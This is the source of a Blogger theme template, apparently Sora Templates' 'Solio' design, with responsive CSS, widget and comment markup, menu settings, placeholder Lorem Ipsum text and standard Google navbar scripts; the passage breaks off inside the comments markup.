.container, .project-head, .author-intro-widgets-duo .container{ box-sizing:border-box; padding:0 20px } .home #header-wrap { top:0; } .home #header-wrap, #header-wrap { background:#ffffff; box-shadow: 0 2px 40px 0 rgba(0,0,0,.08); } #header-wrap .container { box-shadow:none; } #slider-section { padding: 0 20px; box-sizing: border-box; } #intro-services-wrap{ box-sizing:border-box; padding:80px 20px } .intro-image { width: 100%; max-width: 540px; flex: 100%; margin: 0 auto; order: 0; } .intro-content { width: 100%; max-width: 100%; flex: 100%; margin: 0 auto; order: 13; } .intro-title { font-size: 30px; } .intro-snippet { font-size: 14px; line-height: 24px; } #main-intro { padding-top:68px; } .counter-box { padding: 40px 20px; } .counter-box-wrap,.counter-title { border-radius:0; } } @media (max-width: 980px) { #main-menu, #parallax-menu, .home #parallax-menu{ display:none } .mobile-menu-wrap,.scrolling-mobile-menu-wrap,.mobile-menu-toggle, .home .scrolling-mobile-menu-toggle{ display:block } .counter-box-item { width: 50%; } .faq-toggle { background-attachment: inherit; } #content-wrapper > .container{ margin:0 } .grid-posts { grid-template-columns: repeat(2,1fr); } .item #main-wrapper,#sidebar-wrapper{ width:100%; padding:0 } #brand-services-wrap li { width: calc(100% / 3); margin-bottom: 30px; } .counter-box-info, .counter-box-image { width: 100%; padding: 0; } .counter-box-image { margin-bottom:20px; } .counter-image-wrap, .counter-image-wrap .widget, .counter-image-wrap .widget-content, .counter-image-wrap .counter-content { min-height: 307px; max-height: 307px; } .editorial-authors .widget .editorial-avatar-wrap .editorial-avatar { height: 310px; } #author-email-pic { display: block; position: absolute; right: 0; z-index: 1; bottom: 0; opacity: 0.7; } .top-bar-social { width: 100%; z-index: 9; padding: 25px 0; } } @media (max-width: 780px) { #main-intro{ height:380px } .author-intro-widgets .author-list, .author-intro-widgets .author-list .widget { width: 100%; } #brand-services-wrap { padding: 20px 0; } .author-intro-widgets, #serv-tile { grid-template-columns: 1fr; } #intro-author-heading, .author-intro-widgets { width: 100%; } #intro-author-photo{ display:none; } .post-snippet { font-size: 13px; margin: 0; } .index-post .post-info > h2 { font-size: 22px; } #social-footer{ width:100%; margin:0 0 10px } .social-footer ul li{ margin:0 7px } #footer-copyright .copyright-area{ width:100%; text-align:center; overflow:hidden; } .top-bar-nav { width: 100%; text-align: center; clear: both; } .top-bar-nav ul li { float: none; display: inline-block; } .errorWrap{ padding:60px 0 80px } } @media (max-width:767px) { .intro-snippet { font-size: 13px; } .intro-title { font-size: 30px; margin: 0 0 10px; } .intro-action a { margin: 10px 0 0; } .slide-in { display:none; } } @media screen and (max-width: 769px) { #slider-wrapper .PopularPosts .main-slider { grid-template-columns: repeat(2,1fr); } } @media screen and (max-width: 681px) { #slider-wrapper .PopularPosts .main-slider { grid-template-columns: 1fr; grid-gap: 0px; } } @media (max-width: 680px) { #intro-services .widget{ width:100%; margin:50px 0 0 } #intro-services .widget:first-child{ margin:0 } #contact-left,#contact-right{ width:100% } #contact-left .widget:last-child{ margin:0 0 35px } .post-labels{ width:100%; margin:0 0 25px } .post-labels a{ margin:0 10px 5px 0 } .post-share{ float:left } .share-links li{ margin:5px 5px 0 0 } } @media screen and (max-width: 560px) { .author-intro-widgets-duo .container { grid-template-columns: 1fr; } .author-intro-widgets-duo .author-list .service-icon { float: left; margin-left: 0; margin-right: 25px } .author-intro-widgets-duo .widget, .author-intro-widgets-duo .author-list.right-side-widget .widget{ border-bottom: 2px solid #192E44; padding:35px 0; } .author-intro-widgets-duo .author-list.left-side-widget .service-content { text-align:left; } .author-intro-widgets-duo .left-side-widget { border-right:0; } .main-slider .post-title { font-size: 18px; } .grid-posts { grid-template-columns: 1fr; } } @media (max-width: 540px) { #main-intro{ height:auto } .top-bar-social { float: none; text-align: center; } .top-bar-social ul > li { float: none; } .author-intro-widgets .author-list { width: 100%; } #brand-services-wrap { padding: 10px 0; } .index-post { width: 100%; } .feat-big li { width: 100%; padding: 0; } .editorial-authors .widget { width: 100%; margin-bottom: 15px; padding: 0; } .editorial-authors .widget:last-child { margin: 0; } .editorial-authors .widget .editorial-avatar-wrap .editorial-avatar img { object-position: top; } .intro-title{ font-size:27px } #intro-author-wrap{ padding:0 } #content-wrapper{ margin:50px 0 } .item #content-wrapper{ margin:40px 0 } .serv-tile-box-info { text-align: center; } .email-folower .email-letter-text, .email-folower .follow-by-email-inner { float: none; width: 100%; padding: 0; } ul.related-posts{ margin:0 } .related-posts .related-item{ width:100%; padding:0; margin:20px 0 0 } .related-posts .item-0{ margin:0 } .related-posts .post-image-link{ width:75px; height:60px; float:left; margin:0 12px 0 0 } .related-posts .post-title{ font-size:15px; overflow:hidden; margin:0 0 5px } #brand-services-wrap li { width: calc(100% / 2); } } @media (max-width: 480px) { .counter-box-wrap { grid-template-columns: 1fr; } .counter-box-wrap .widget { width: 100%; padding: 15px 10px; } .solio-svg-shape svg { margin-bottom: 5px; } } @media (max-width: 440px) { #serv-tile .widget { width: 100%; margin-bottom: 10px; } .counter-box-item { width: 100%; } .item-post h1.post-title{ font-size:23px } .head-text .widget-content{ line-height:24px } } @media (max-width: 360px) { .intro-title,.author-title,.head-text .widget-title > h3{ font-size:25px } .index-post{ width:100% } .errorWrap h3{ font-size:120px } .errorWrap h4{ font-weight:600 } } #editorial-box { clear: both; } ]]>
.container{ margin:0 } body#layout .head-text,body#layout #serv-tile{ float:none; width:auto } body#layout #main-wrapper{ width: 65%; padding: 0; margin: 0; float: left; } body#layout #contact-area .container{ display:flex } body#layout #contact-area .section{ width:50% } body#layout .contact-col .Text .widget-content{ margin:0 } body#layout #sidebar-wrapper{ float:right; display: block; width: 35%; padding: 0; } body#layout .sidebar .widget,body#layout .sidebar .widget-content{float:none;overflow:visible;width:auto;} body#layout .top-bar-nav, body#layout .top-bar-social { width: auto; float:none; } body#layout #top-bar { height: auto; } body#layout #serv-tile { display: block; } body#layout .author-intro-widgets { display: flex; } body#layout .author-intro-widgets .author-list { width: 33.333%; float: left; } body#layout #footer-copyright{ padding:0 } body#layout .top-bar-social .FollowByEmail { max-width: 100%; } body#layout #intro-author-heading { width: auto; float: none; display: block; } body#layout #intro-author-wrap .container { display:block; } body#layout .author-intro-widgets { margin:0 auto; } body#layout .counter-box .container { display: flex; } body#layout .counter-box-info, body#layout .counter-box-image { float: left; width: 50%; } body#layout .counter-box-image { display: flex; } body#layout .counter-image-wrap { width: 100%; } body#layout #counter-box-bg .container { display: block; } body#layout .author-intro-widgets-duo .container { display: flex; } body#layout .author-intro-widgets-duo .container .author-list { width: 100%; } /*------Layout (end)----------*/ ]]>
<input class='contact-form-button btn contact-form-button-submit' expr:id='data:widget.instanceId + "_contact-form-submit"' expr:value='data:contactFormSendMsg' type='button'/> <p class='contact-form-error-message' expr:id='data:widget.instanceId + "_contact-form-error-message"'/> <p class='contact-form-success-message' expr:id='data:widget.instanceId + "_contact-form-success-message"'/> </form> </div> </div> </b:includable> </b:defaultmarkup> <b:defaultmarkup type='PopularPosts'> <b:includable id='main' var='this'> <b:include name='widget-title'/> <div class='widget-content'> <b:tag class='main-slider' cond='data:widget.sectionId == "slider-section"' name='ul'> <b:loop index='i' values='data:posts' var='post'> <b:include data='post' name='postContent'/> </b:loop> </b:tag> </div> </b:includable> <b:includable id='postContent' var='post'> <b:if cond='data:widget.sectionId == "slider-section"'> <b:include data='post' name='slider-section'/> <b:else/> <b:include data='post' name='default'/> </b:if> </b:includable> <b:includable id='slider-section' var='post'> <b:if cond='data:i lt 10'> <li class='slider-item'> <b:class expr:name='"item-"+data:i'/> <a class='post-image-link' expr:href='data:post.url'> <b:if cond='data:post.featuredImage'> <img class='post-thumb' expr:alt='data:post.title' expr:src='data:post.featuredImage.isYouTube ? resizeImage(data:post.featuredImage.youtubeMaxResDefaultUrl.jsonEscaped, 72, "1:1") : resizeImage(data:post.featuredImage, 72, "1:1")'/> <b:else/> <img class='post-thumb' expr:alt='data:post.title' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEnGLn1y_ydfNLPlq88boVobLEoCz4XKUZWiKMu2AQx0RQp_4NDEy-neRRelOljWsJrfxKXrG0tNe0-SKjA54F87t2e4TRVnwSLOxJkWUmjvieDpYCY_F2Qy4KjNQsxK_OCkxViBJ6t_o/w680/nth.png'/> </b:if> </a> <div class='post-info-wrap'><div class='post-info'> <b:if cond='data:post.labels'><span class='post-tag'><data:post.labels.first.name/></span></b:if> <h2 class='post-title'> <a expr:href='data:post.url'><data:post.title/></a> </h2> </div></div> </li> </b:if> </b:includable> <b:includable id='default' var='post'> <div class='post default-popularpost'> <b:class expr:name='"item-"+data:i'/> <div class='post-content'> <a class='post-image-link' expr:href='data:post.url'> <b:if cond='data:post.featuredImage'> <img class='post-thumb' expr:alt='data:post.title' expr:src='data:post.featuredImage.isYouTube ? resizeImage(data:post.featuredImage.youtubeMaxResDefaultUrl.jsonEscaped, 72, "1:1") : resizeImage(data:post.featuredImage, 72, "1:1")'/> <b:else/> <img class='post-thumb' expr:alt='data:post.title' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEnGLn1y_ydfNLPlq88boVobLEoCz4XKUZWiKMu2AQx0RQp_4NDEy-neRRelOljWsJrfxKXrG0tNe0-SKjA54F87t2e4TRVnwSLOxJkWUmjvieDpYCY_F2Qy4KjNQsxK_OCkxViBJ6t_o/w680/nth.png'/> </b:if> </a> <div class='post-info'> <h2 class='post-title'> <a expr:href='data:post.url'><data:post.title/></a> </h2> <div class='post-meta'> <span class='post-date published' expr:datetime='data:post.date.iso8601'><data:post.date/></span> </div> </div> </div> </div> </b:includable> </b:defaultmarkup> <b:defaultmarkup type='Header'> <b:includable id='main' var='this'> <div class='header-widget'> <b:include cond='data:imagePlacement in {"REPLACE", "BEFORE_DESCRIPTION"}' name='image'/> <b:include cond='data:imagePlacement not in {"REPLACE", "BEFORE_DESCRIPTION"}' name='title'/> <b:include cond='data:imagePlacement != "REPLACE"' name='description'/> </div> </b:includable> <b:includable id='description'> <p> <data:this.description/> </p> </b:includable> <b:includable id='image'> <a class='header-brand' expr:href='data:blog.homepageUrl'> <img expr:alt='data:blog.title.escaped' expr:data-height='data:height' expr:data-width='data:width' expr:src='data:image'/> </a> </b:includable> <b:includable id='title'> <h1> <b:tag cond='data:view.url != data:blog.homepageUrl' expr:href='data:blog.homepageUrl' name='a'> <data:title/> </b:tag> </h1> </b:includable> </b:defaultmarkup> <b:defaultmarkup type='Label'> <b:includable id='main' var='this'> <b:include name='widget-title'/> <b:include name='content'/> </b:includable> <b:includable id='content'> <div class='widget-content'> <b:class expr:name='data:this.display + "-label"'/> <b:include cond='data:this.display == "list"' name='list'/> <b:include cond='data:this.display == "cloud"' name='list'/> </div> </b:includable> <b:includable id='list'> <ul> <b:loop values='data:labels' var='label'> <li> <a class='label-name' expr:href='data:label.url'> <data:label.name/> <b:if cond='data:this.showFreqNumbers'> <span class='label-count'>(<data:label.count/>)</span> </b:if> </a> </li> </b:loop> </ul> </b:includable> </b:defaultmarkup> </b:defaultmarkups> <!-- Google Analytics --> <b:include data='blog' name='google-analytics'/> <link rel="me" href="https://www.blogger.com/profile/00410926751550131360" /> <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/> <meta name='google-adsense-platform-domain' content='blogspot.com'/> <!-- data-ad-client=data:adClientId --> <!-- --><style type="text/css">@import url(https://www.blogger.com/static/v1/v-css/navbar/3334278262-classic.css); div.b-mobile {display:none;} </style> </head> <body expr:class='data:blog.pageType'><script type="text/javascript"> function setAttributeOnload(object, attribute, val) { if(window.addEventListener) { window.addEventListener('load', function(){ object[attribute] = val; }, false); } else { window.attachEvent('onload', function(){ object[attribute] = val; }); } } </script> <div id="navbar-iframe-container"></div> <script type="text/javascript" src="https://apis.google.com/js/platform.js"></script> <script type="text/javascript"> gapi.load("gapi.iframes:gapi.iframes.style.bubble", function() { if (gapi.iframes && gapi.iframes.getContext) { gapi.iframes.getContext().openChild({ url: 'https://www.blogger.com/navbar/4182721249027336542?origin\x3dhttps://enjazalthameen.blogspot.com', where: document.getElementById("navbar-iframe-container"), id: "navbar-iframe" }); } }); </script> <b:class cond='data:view.isHomepage' name='home'/> <b:class cond='data:view.isPage' name='item'/> <b:class cond='data:view.isArchive' name='index'/> <b:class cond='data:view.isError' name='error404'/> <!--preloader start--> <div id='preloader'> <div id='loader'/> </div> <!--preloader end--> <!-- Theme Options --> <div class='theme-options' style='display:none'> <b:section class='sora-panel' id='sora-panel' maxwidgets='1' name='Theme Options' showaddelement='no'> <b:widget id='LinkList71' locked='true' title='Default Variables' type='LinkList' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='link-3'>8</b:widget-setting> <b:widget-setting name='sorting'>NONE</b:widget-setting> <b:widget-setting name='link-4'>5</b:widget-setting> <b:widget-setting name='text-1'>commentsSystem</b:widget-setting> <b:widget-setting name='link-1'>blogger</b:widget-setting> <b:widget-setting name='text-0'>disqusShortname</b:widget-setting> <b:widget-setting name='link-2'>8</b:widget-setting> <b:widget-setting name='text-3'>postPerPage</b:widget-setting> <b:widget-setting name='link-0'>soratemplates</b:widget-setting> <b:widget-setting name='text-2'>postPerPage</b:widget-setting> <b:widget-setting name='text-4'>postPerPage</b:widget-setting> </b:widget-settings> <b:includable id='main'> <b:include name='content'/> </b:includable> <b:includable id='content'> <script type='text/javascript'> //<![CDATA[ <b:loop values='data:links' var='link'> <b:if cond='data:link.name == "postPerPage"'> var postPerPage = <data:link.target/>; </b:if> <b:if cond='data:link.name == "commentsSystem"'> var commentsSystem = "<data:link.target/>"; </b:if> <b:if cond='data:link.name == "disqusShortname"'> var disqusShortname = "<data:link.target/>"; </b:if> </b:loop> //]]> </script> </b:includable> </b:widget> </b:section> </div> <!-- Outer Wrapper --> <div id='outer-wrapper'> <!-- Header Wrapper --> <div id='header-wrap'> <div class='container row'> <b:section class='header-logo' id='header-logo' maxwidgets='1' name='Header Logo' showaddelement='yes'> <b:widget id='Header1' locked='true' title='Solio (Header)' type='Header' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='displayUrl'>https://blogger.googleusercontent.com/img/a/AVvXsEhtwwnjV5q3AKOkxdTtraGFFPSd6Rj__2GUxRcyT_ctKBCkYzwF3oDrkprI5Vn4vtJdrt96mzsrvTnPaufmdfLZE1usZQUnpqlc-WU_i3utj2h9glejKXdj8WvDvQXHDNrGOCc6Efr6GzY-m97bsRwB-_DYZE9SHTmHiYoO0eBUNgAcw2PIiHWWG4mZCw=s154</b:widget-setting> <b:widget-setting name='displayHeight'>38</b:widget-setting> <b:widget-setting name='sectionWidth'>150</b:widget-setting> <b:widget-setting name='useImage'>true</b:widget-setting> <b:widget-setting name='shrinkToFit'>false</b:widget-setting> <b:widget-setting name='imagePlacement'>REPLACE</b:widget-setting> <b:widget-setting name='displayWidth'>154</b:widget-setting> </b:widget-settings> <b:includable id='main' var='this'> <div class='header-widget'> <b:include cond='data:imagePlacement in {"REPLACE", "BEFORE_DESCRIPTION"}' name='image'/> <b:include cond='data:imagePlacement not in {"REPLACE", "BEFORE_DESCRIPTION"}' name='title'/> <b:include cond='data:imagePlacement != "REPLACE"' name='description'/> </div> </b:includable> <b:includable id='behindImageStyle'> <b:if cond='data:sourceUrl'> <b:include cond='data:this.image' data='{ image: data:this.image, selector: ".header-widget" }' name='responsiveImageStyle'/> <style type='text/css'> .header-widget { background-position: <data:blog.locale.languageAlignment/>; background-repeat: no-repeat; } </style> </b:if> </b:includable> <b:includable id='description'> <p> <data:this.description/> </p> </b:includable> <b:includable id='image'> <a class='header-brand' expr:href='data:blog.homepageUrl'> <img expr:alt='data:blog.title.escaped' expr:data-height='data:height' expr:data-width='data:width' expr:src='data:image'/> </a> </b:includable> <b:includable id='title'> <h1> <b:tag cond='data:view.url != data:blog.homepageUrl' expr:href='data:blog.homepageUrl' name='a'> <data:title/> </b:tag> </h1> </b:includable> </b:widget> </b:section> <b:section class='scrolling-menu' id='parallax-menu' maxwidgets='1' name='Scrolling Menu' showaddelement='yes'> <b:widget id='LinkList1' locked='true' title='Menu' type='LinkList' visible='true'> <b:widget-settings> <b:widget-setting name='link-5'>#testimonial-wrap</b:widget-setting> <b:widget-setting name='link-6'>#main-wrapper</b:widget-setting> <b:widget-setting name='link-3'>#intro-author-wrap</b:widget-setting> <b:widget-setting name='link-4'>#head-text2</b:widget-setting> <b:widget-setting name='text-1'>Services</b:widget-setting> <b:widget-setting name='text-0'>Home</b:widget-setting> <b:widget-setting name='text-3'>Information</b:widget-setting> <b:widget-setting name='text-2'>Conuter</b:widget-setting> <b:widget-setting name='text-5'>Reviews</b:widget-setting> <b:widget-setting name='text-4'>Projects</b:widget-setting> <b:widget-setting name='text-6'>Blog</b:widget-setting> <b:widget-setting name='sorting'>NONE</b:widget-setting> <b:widget-setting name='link-1'>#serv-tile-wrap</b:widget-setting> <b:widget-setting name='link-2'>#counter-image-nav</b:widget-setting> <b:widget-setting name='link-0'>#header-wrap</b:widget-setting> </b:widget-settings> <b:includable id='main'> <b:include name='widget-title'/> <b:include name='content'/> </b:includable> <b:includable id='content'> <div class='widget-content'> <ul> <b:loop values='data:links' var='link'> <li><a expr:href='data:link.target'><data:link.name/></a></li> </b:loop> </ul> </div> </b:includable> </b:widget> </b:section> <span class='scrolling-mobile-menu-toggle'/> <b:section class='main-menu' id='main-menu' maxwidgets='1' name='Main Menu' showaddelement='yes'> <b:widget id='LinkList74' locked='true' title='Menu Widget' type='LinkList' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='text-10'>_Web Documentation</b:widget-setting> <b:widget-setting name='sorting'>NONE</b:widget-setting> <b:widget-setting name='link-1'>#</b:widget-setting> <b:widget-setting name='link-2'>#</b:widget-setting> <b:widget-setting name='link-12'>https://www.soratemplates.com/2023/04/solio-blogger-templates.html</b:widget-setting> <b:widget-setting name='link-0'>/</b:widget-setting> <b:widget-setting name='link-11'>https://youtu.be/y7KMpN9IXRE</b:widget-setting> <b:widget-setting name='link-10'>https://www.sorabloggingtips.com/2023/04/how-to-setup-solio-blogger-template.html</b:widget-setting> <b:widget-setting name='text-9'>Documentation</b:widget-setting> <b:widget-setting name='link-9'>#</b:widget-setting> <b:widget-setting name='text-8'>_Error Page</b:widget-setting> <b:widget-setting name='link-7'>https://www.sorabloggingtips.com/2017/01/how-to-add-sitemap-widget-in-blogspot-blogs.html</b:widget-setting> <b:widget-setting name='link-8'>https://solio-soratemplates.blogspot.com/soratemplates</b:widget-setting> <b:widget-setting name='link-5'>#</b:widget-setting> <b:widget-setting name='link-6'>https://solio-soratemplates.blogspot.com/p/shortcodes.html</b:widget-setting> <b:widget-setting name='link-3'>#</b:widget-setting> <b:widget-setting name='link-4'>#</b:widget-setting> <b:widget-setting name='text-1'>Features</b:widget-setting> <b:widget-setting name='text-0'>Home</b:widget-setting> <b:widget-setting name='text-3'>__DropDown 1</b:widget-setting> <b:widget-setting name='text-2'>_Multi DropDown</b:widget-setting> <b:widget-setting name='text-5'>__DropDown 3</b:widget-setting> <b:widget-setting name='text-4'>__DropDown 2</b:widget-setting> <b:widget-setting name='text-7'>_SiteMap</b:widget-setting> <b:widget-setting name='text-6'>_ShortCodes</b:widget-setting> <b:widget-setting name='text-11'>_Video Documentation</b:widget-setting> <b:widget-setting name='text-12'>Download This Template</b:widget-setting> </b:widget-settings> <b:includable id='main'> <b:include name='content'/> </b:includable> <b:includable id='content'> <ul id='main-menu-nav' role='menubar'> <b:loop values='data:links' var='link'> <li><a expr:href='data:link.target' role='menuitem'><data:link.name/></a></li> </b:loop> </ul> </b:includable> </b:widget> </b:section> <span class='mobile-menu-toggle'/> </div> <div class='scrolling-mobile-menu-wrap'> <div class='scrolling-mobile-menu'/> </div> <div class='mobile-menu-wrap'> <div class='mobile-menu'/> </div> </div> <div class='clearfix'/> <b:if cond='data:view.isHomepage'> <!-- Featured Slider --> <div id='intro-wrap'> <b:section class='full-height' id='main-intro' maxwidgets='2' name='Main Intro' showaddelement='no'> <b:widget id='Image1' locked='true' title='Generate More Traffic on your Website.' type='Image' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='displayUrl'>https://blogger.googleusercontent.com/img/a/AVvXsEiWjCddzC9lKlxzLqhbdgbOUYx05Z2vHIG-OsVmduMdWmUe4D5xOeZuhFYkZsAmf-uK5q8jOFDiyAJWOtk6JeCEj51jzv4HAAIIOglovkuLb4iY3Iv1TViyor3tN4tOU63Etfbp0nDMMnxx3YqowGcJiUWZH2JW93iZqxmnylK-BaplsMFuQk1Dp-n0Aw=s1064</b:widget-setting> <b:widget-setting name='displayHeight'>938</b:widget-setting> <b:widget-setting name='sectionWidth'>150</b:widget-setting> <b:widget-setting name='shrinkToFit'>false</b:widget-setting> <b:widget-setting name='displayWidth'>1064</b:widget-setting> <b:widget-setting name='link'>/#Know More</b:widget-setting> <b:widget-setting name='caption'><![CDATA[It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here'.]]></b:widget-setting> </b:widget-settings> <b:includable id='main'> <b:include name='content'/> </b:includable> <b:includable id='content'> <div class='row container widget-content'> <style type='text/css'> #intro-wrap{display:block} </style> <div class='intro-image'><img expr:src='data:sourceUrl'/></div> <div class='intro-content'> <h3 class='intro-title'><data:title/></h3> <b:if cond='data:caption'> <p class='intro-snippet'><data:caption/></p> </b:if> <b:if cond='data:link'> <div class='intro-action'> <script type="text/javascript"> var ilc = "<data:link/>", ima = ilc.split("#"), ili = ima[0].trim(), ilt = ima[1].trim(), kod = "<a href="+ ili +">"+ ilt +"</a>"; document.write(kod) </script> </div> </b:if> </div> </div> </b:includable> </b:widget> </b:section> <div class='clearfix'/> </div> </b:if> <!-- Content Wrapper --> <div id='content-wrapper'> <div class='container row'> <!-- Main Wrapper --> <div id='main-wrapper'> <b:if cond='data:view.isMultipleItems'> <b:section class='wow bounceInUp head-text' id='head-text1' maxwidgets='1' name='Headline Text 03' showaddelement='no'> <b:widget id='Text1' locked='true' title='Recent Blog Posts' type='Text' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='content'><![CDATA[Lorem Ipsum has been the industry's standard dummy text.]]></b:widget-setting> </b:widget-settings> <b:includable id='main'> <b:include name='widget-title'/> <p class='widget-content'><data:content/></p> </b:includable> </b:widget> </b:section> <div class='clearfix'/> </b:if> <b:section class='main' id='main' maxwidgets='1' name='Main Posts' showaddelement='yes'> <b:widget id='Blog1' locked='true' title='Blog Posts' type='Blog' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='showDateHeader'>false</b:widget-setting> <b:widget-setting name='commentLabel'>Comments</b:widget-setting> <b:widget-setting name='style.textcolor'>#ffffff</b:widget-setting> <b:widget-setting name='showShareButtons'>true</b:widget-setting> <b:widget-setting name='authorLabel'>by</b:widget-setting> <b:widget-setting name='showCommentLink'>true</b:widget-setting> <b:widget-setting name='style.urlcolor'>#ffffff</b:widget-setting> <b:widget-setting name='showAuthor'>true</b:widget-setting> <b:widget-setting name='style.linkcolor'>#ffffff</b:widget-setting> <b:widget-setting name='style.unittype'>TextAndImage</b:widget-setting> <b:widget-setting name='style.bgcolor'>#ffffff</b:widget-setting> <b:widget-setting name='timestampLabel'/> <b:widget-setting name='reactionsLabel'/> <b:widget-setting name='showAuthorProfile'>true</b:widget-setting> <b:widget-setting name='style.layout'>1x1</b:widget-setting> <b:widget-setting name='showLabels'>true</b:widget-setting> <b:widget-setting name='showLocation'>false</b:widget-setting> <b:widget-setting name='postLabelsLabel'>Tags:</b:widget-setting> <b:widget-setting name='showTimestamp'>true</b:widget-setting> <b:widget-setting name='postsPerAd'>1</b:widget-setting> <b:widget-setting name='showBacklinks'>false</b:widget-setting> <b:widget-setting name='style.bordercolor'>#ffffff</b:widget-setting> <b:widget-setting name='showInlineAds'>false</b:widget-setting> <b:widget-setting name='showReactions'>false</b:widget-setting> </b:widget-settings> <b:includable id='main' var='this'> <b:include name='searchMessage'/> <div class='blog-posts hfeed'> <b:class cond='data:view.isMultipleItems' name='index-post-wrap'/> <b:class cond='data:view.isSingleItem' name='item-post-wrap'/> <b:tag class='grid-posts' cond='data:view.isMultipleItems' name='div'> <b:loop index='i' values='data:posts' var='post'> <b:include data='post' name='postCommentsAndAd'/> </b:loop> </b:tag> </div> <b:include cond='data:view.isMultipleItems' name='postPagination'/> <b:include name='feedLinks'/> </b:includable> <b:includable id='aboutPostAuthor'> <b:comment>Disabled</b:comment> </b:includable> <b:includable id='addComments'> <a expr:href='data:post.commentsUrl' expr:onclick='data:post.commentsUrlOnclick'> <b:message name='messages.postAComment'/> </a> </b:includable> <b:includable id='backLinks' var='post'> <b:comment>Disabled</b:comment> </b:includable> <b:includable id='blogThisShare'> <b:with value='"window.open(this.href, \"_blank\", \"height=270,width=475\"); return false;"' var='onclick'> <b:include name='platformShare'/> </b:with> </b:includable> <b:includable id='bylineByName' var='byline'> <b:switch var='data:byline.name'> <b:case value='share'/> <b:include cond='data:post.shareUrl' name='postShareButtons'/> <b:case value='comments'/> <b:include cond='data:post.allowComments' name='postCommentsLink'/> <b:case value='location'/> <b:include cond='data:post.location' name='postLocation'/> <b:case value='timestamp'/> <b:include cond='not data:view.isPage' name='postTimestamp'/> <b:case value='author'/> <b:include name='postAuthor'/> <b:case value='labels'/> <b:include cond='data:post.labels' name='postLabels'/> <b:case value='icons'/> <b:include cond='data:post.emailPostUrl' name='emailPostIcon'/> <b:case value='reactions'/> <b:include cond='data:post.reactionsUrl' name='postReactions'/> </b:switch> </b:includable> <b:includable id='bylineRegion' var='regionItems'> <b:loop values='data:regionItems' var='byline'> <b:include data='byline' name='bylineByName'/> </b:loop> </b:includable> <b:includable id='commentAuthorAvatar'> <div class='avatar-image-container'> <img class='author-avatar' expr:src='data:comment.authorAvatarSrc' height='45' width='45'/> </div> </b:includable> <b:includable id='commentDeleteIcon' var='comment'> <span expr:class='"item-control " + data:comment.adminClass'> <b:if cond='data:showCmtPopup'> <div class='goog-toggle-button'> <div class='goog-inline-block comment-action-icon'/> </div> <b:else/> <a class='comment-delete' expr:href='data:comment.deleteUrl' expr:title='data:messages.deleteComment'> <img src='https://resources.blogblog.com/img/icon_delete13.gif'/> </a> </b:if> </span> </b:includable> <b:includable id='commentForm' var='post'> <div class='comment-form'> <a name='comment-form'/> <b:if cond='data:this.messages.blogComment != ""'> <p><data:this.messages.blogComment/></p> </b:if> <b:include data='post' name='commentFormIframeSrc'/> <iframe allowtransparency='allowtransparency' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight ?: "90px"' frameborder='0' id='comment-editor' name='comment-editor' src='' width='100%'/> <data:post.cmtfpIframe/> <script type='text/javascript'> BLOG_CMT_createIframe('<data:post.appRpcRelayPath/>'); </script> </div> </b:includable> <b:includable id='commentFormIframeSrc' var='post'> <a expr:href='data:post.commentFormIframeSrc + "&skin=contempo"' id='comment-editor-src'/> </b:includable> <b:includable id='commentItem' var='comment'> <div class='comment' expr:id='"c" + data:comment.id'> <b:include cond='data:blog.enabledCommentProfileImages' name='commentAuthorAvatar'/> <div class='comment-block'> <div class='comment-author'> <b:if cond='data:comment.authorUrl'> <b:message name='messages.authorSaidWithLink'> <b:param expr:value='data:comment.author' name='authorName'/> <b:param expr:value='data:comment.authorUrl' name='authorUrl'/> </b:message> <b:else/> <b:message name='messages.authorSaid'> <b:param expr:value='data:comment.author' name='authorName'/> </b:message> </b:if> </div> <div expr:class='"comment-body" + (data:comment.isDeleted ? " deleted" : "")'> <data:comment.body/> </div> <div class='comment-footer'> <span class='comment-timestamp'> <a expr:href='data:comment.url' title='comment permalink'> <data:comment.timestamp/> </a> <b:include data='comment' name='commentDeleteIcon'/> </span> </div> </div> </div> </b:includable> <b:includable id='commentList' var='comments'> <div id='comments-block'> <b:loop values='data:comments' var='comment'> <b:include data='comment' name='commentItem'/> </b:loop> </div> </b:includable> <b:includable id='commentPicker' var='post'> <b:if cond='data:post.commentSource == 1'> <b:include data='post' name='iframeComments'/> <b:elseif cond='data:post.showThreadedComments'/> <b:include data='post' name='threadedComments'/> <b:else/> <b:include data='post' name='comments'/> </b:if> </b:includable> <b:includable id='comments' var='post'> <section expr:class='"comments" + (data:post.embedCommentForm ? " embed" : "")' expr:data-num-comments='data:post.numberOfComments' id='comments'> <a name='comments'/> <b:if cond='data:post.allowComments'> <b:include name='commentsTitle'/> <div expr:id='data:widget.instanceId + "_comments-block-wrapper"'> <b:include cond='data:post.comments' data='post.comments' name='commentList'/> </div> <b:if cond='data:post.commentPagingRequired'> <div class='paging-control-container'> <b:if cond='data:post.hasOlderLinks'> <a expr:class='data:post.oldLinkClass' expr:href='data:post.oldestLinkUrl'> <data:messages.oldest/> </a> <a expr:class='data:post.oldLinkClass' expr:href='data:post.olderLinkUrl'> <data:messages.older/> </a> </b:if> <span class='comment-range-text'> <data:post.commentRangeText/> </span> <b:if cond='data:post.hasNewerLinks'> <a expr:class='data:post.newLinkClass' expr:href='data:post.newerLinkUrl'> <data:messages.newer/> </a> <a expr:class='data:post.newLinkClass' expr:href='data:post.newestLinkUrl'> <data:messages.newest/> </a> </b:if> </div> </b:if> <div class='footer'> <b:if cond='data:post.embedCommentForm'> <b:if cond='data:post.allowNewComments'> <b:include data='post' name='commentForm'/> <b:else/> <data:post.noNewCommentsText/> </b:if> <b:else/> <b:if cond='data:post.allowComments'> <b:include data='post' name='addComments'/> </b:if> </b:if> </div> </b:if> <b:if cond='data:showCmtPopup'> <div id='comment-popup'> <iframe allowtransparency='allowtransparency' frameborder='0' id='comment-actions' name='comment-actions' scrolling='no'> </iframe> </div> </b:if> </section> </b:includable> <b:includable id='commentsLink'> <a class='comment-link' expr:href='data:post.commentsUrl' expr:onclick='data:post.commentsUrlOnclick'> <b:if 